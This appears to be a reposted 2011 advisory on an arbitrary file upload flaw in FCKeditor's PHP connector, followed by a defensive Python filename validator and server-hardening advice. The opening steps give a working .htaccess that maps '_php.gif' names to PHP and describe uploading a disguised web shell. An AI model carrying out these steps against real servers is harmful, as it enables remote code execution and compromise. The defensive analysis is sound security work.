FCKeditor: upload vulnerability in all PHP versions
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available on the server.
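The steps above rely on two weaknesses working together: the upload connector accepts a dotfile (the .htaccess), and its rename step keeps the string "php" in the stored name (shell.php.gif becomes shell_php.gif), so the attacker-supplied .htaccess can map that name to the PHP handler. The following filename policy is an added example of how a defender would close both gaps before a file is written to disk; it is not FCKeditor's own connector code, and the extension whitelist and executable-token list are assumptions for this example.

```python
"""
Defensive filename policy for an image-upload directory.
Added example for this advisory; not FCKeditor's own code.
"""
import os
import re
from typing import Optional

# Extensions this image-upload endpoint is meant to serve (assumed policy).
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Tokens an Apache/PHP host may be configured to execute, which must not
# appear anywhere in a stored name, not just as the last extension.
EXECUTABLE_TOKENS = {"php", "php3", "php4", "php5", "phtml", "phar"}

_SAFE_BASE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]*$")


def reject_reason(filename: str) -> Optional[str]:
    """Return None if the name is acceptable, else a short reason string."""
    name = os.path.basename(filename)
    if name != filename:
        return "path separator in name"
    if name.startswith("."):
        # Blocks .htaccess (step 1 of the advisory) and other dotfiles.
        return "dotfile (e.g. .htaccess)"
    parts = name.lower().split(".")
    if len(parts) != 2:
        # Blocks shell.php.gif: exactly one extension is allowed.
        return "exactly one extension required"
    base, ext = parts
    if ext not in ALLOWED_EXTENSIONS:
        return f"extension .{ext} not allowed"
    # Split the base on '_' and '-' so a renamed shell_php.gif is caught too.
    for token in re.split(r"[_-]", base):
        if token in EXECUTABLE_TOKENS:
            return f"executable token '{token}' in base name"
    if not _SAFE_BASE.match(base):
        return "base name contains characters outside [A-Za-z0-9_-]"
    return None


def audit(names):
    """Map each candidate name to its rejection reason (None = accepted)."""
    return {n: reject_reason(n) for n in names}


if __name__ == "__main__":
    # Constructed sample names taken from the advisory's steps plus a benign one.
    for n, why in audit([".htaccess", "shell.php.gif", "shell_php.gif",
                         "photo.gif"]).items():
        print(f"{n:15s} -> {'OK' if why is None else 'REJECT: ' + why}")
```

Name checks only close the connector side of the problem; the upload directory should also be served with AllowOverride None (so an uploaded .htaccess is ignored) and with script execution disabled, so that a stored file is never handed to the PHP engine regardless of its name.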